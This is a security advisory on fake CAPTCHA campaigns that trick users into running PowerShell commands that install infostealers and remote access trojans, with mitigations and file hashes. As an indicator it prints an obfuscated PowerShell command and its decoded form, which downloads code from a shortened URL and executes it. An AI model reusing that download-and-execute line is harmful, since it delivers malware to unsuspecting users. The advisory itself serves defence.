Uptick in Fake CAPTCHA Campaigns Trick Users to Deliver Malware

Executive Summary

Beazley Security has identified an increase in the number of cybercriminal campaigns leveraging fake CAPTCHA pages to trick users in order to distribute infostealers and Remote Access Trojans (RATs). These campaigns trick victims into executing malicious PowerShell commands that stage and execute infostealer malware or Remote Access Trojans (RATs). These attacks eventually lead to credential theft and enabling threat actors to gain remote access to infected systems, which are often leveraged as part of a ransomware attack.

Beazley Security advises organizations to implement technical controls that prevent regular users from executing PowerShell. Furthermore, it is recommended that organizations provide targeted employee training to address this emerging threat effectively.

Technical Details

Beazley Security has observed multiple cases where victims have been lured through malicious advertisements to fake CAPTCHA pages, tricking them into executing malicious PowerShell commands via a social engineering prompt to validate that they are human.

The common component in each incident is a fake CAPTCHA malware delivery system visualized below:

Source: https://labs.guard.io/deceptionads-fake-captcha-driving-infostealer-infections-and-a-glimpse-to-the-dark-side-of-0c516f4dc0b6

‍

More details of the attack kill chain are visualized below:

These CAPTCHA landing pages purportedly include a JavaScript snippet that automatically copies the malicious PowerShell command to a user’s clipboard, reducing suspicion while social engineering the victim.

In most observed incidents reported publicly, malicious PowerShell commands staged and installed infostealer malware onto the victim devices. Infostealer malware, such as Lumma, are designed to harvest user information, including credentials, session cookies, credit card information, browsing history, and even cryptocurrency wallets.

It should be noted that the PowerShell commands could be modified to deliver any family of malware in a given campaign.

Mitigations / Workarounds

A defense-in-depth approach is recommended to protect against these types of social engineering attacks:

• Restrict PowerShell execution for non-administrative users through group policy or Intune configurations, if possible.
• Implement security awareness training to include instruction on recognizing this fake CAPTCHA social engineering technique, the dangers of clicking on suspicious ads, and the importance of never running PowerShell commands or downloading files when prompted to do so from untrusted websites.
• Utilize URL link protection in email and web browsing. Also implement DNS filtering solutions that can detect and prevent users from navigating to watering hole and phishing attacks.
• Deploy modern endpoint detection and response (EDR) solutions that can detect suspicious user-invoked behavior and malicious scripts.
• Reset credentials if any account compromise has been suspected.

Indicators of Compromise

Aside from the fake CAPTCHA, the primary component of this attack is the arbitrary PowerShell payload that gets pasted into the Windows Command Prompt. Across all documented incidents, PowerShell commands presented to victims contained a large, base64 encoded string as an obfuscation step. See an example below:

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -win 1 -ep bypass -noni -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAbAB5AC4AYwB4AC8AUwBYADEAMAAnACkAIAB8ACAASQBFAHgA

When decoded, these payloads instantiate a PowerShell web client to fetch and run a payload behind a URL shortener service, in this case bitly[.]cx (but we’ve seen several URL shortners):

(New-Object Net.WebClient).DownloadString('https://bitly[.]cx/SX10') | IEx

File hashes observed from infostealer malware deployed after PowerShell execution include multiple examples:

• ‍ce4cee2bc712ecc7fac8f6ad14b7fc237ee1ebca borlndmm.dll
• 9f72e339a99efb3c1ec7bbdaaa28e27ab0bbd56d cc32290mt.dll
• 5a143c728b44602f83d0c9d4f90d310841423607 legatee.vhd
• a7fe94c226500c27d740ed5943340fa7d6c01577 protolanguage.php
• 7b520ff8bd1b552e3de00a38a87722f21dc1c9f4 zkwindow.exe
• 1b5fd5739d66cdbb3d08b3d11b45bf49851bc4e0 AUpdate.exe
• 13a9012191b5a59e1e3135c3953e8af63eb1b513 XceedZip.dll
• 98181cd24ccfdb8d2929c53145fe68cac25911db gypsophila.deb
• 1a45049a9d41cb83a9b2648a9e39b44fea043d25 sarape.gz

Infrastructure responsible for delivering infostealer malware observed by Beazley Security eventually redirects to web servers hosted behind Cloudflare's Content Delivery Network (CDN) services, likely to enhance flexibility in rotating target delivery servers and staging campaigns.

How Beazley Security is Responding

Beazley Security is actively monitoring client environments to detect any attempts that leverage fake CAPTCHA attacks to trick clients into downloading and executing malware.

We are also conducting threat hunts across MDR environments to detect and contain novel variations of this attack as it evolves.

Sources

• “DeceptionAds” — Fake Captcha Driving Infostealer Infections and a Glimpse to the Dark Side of Internet Advertising
• Think twice before you click: this captcha might steal your money
• Malicious ads push Lumma infostealer via fake CAPTCHA pages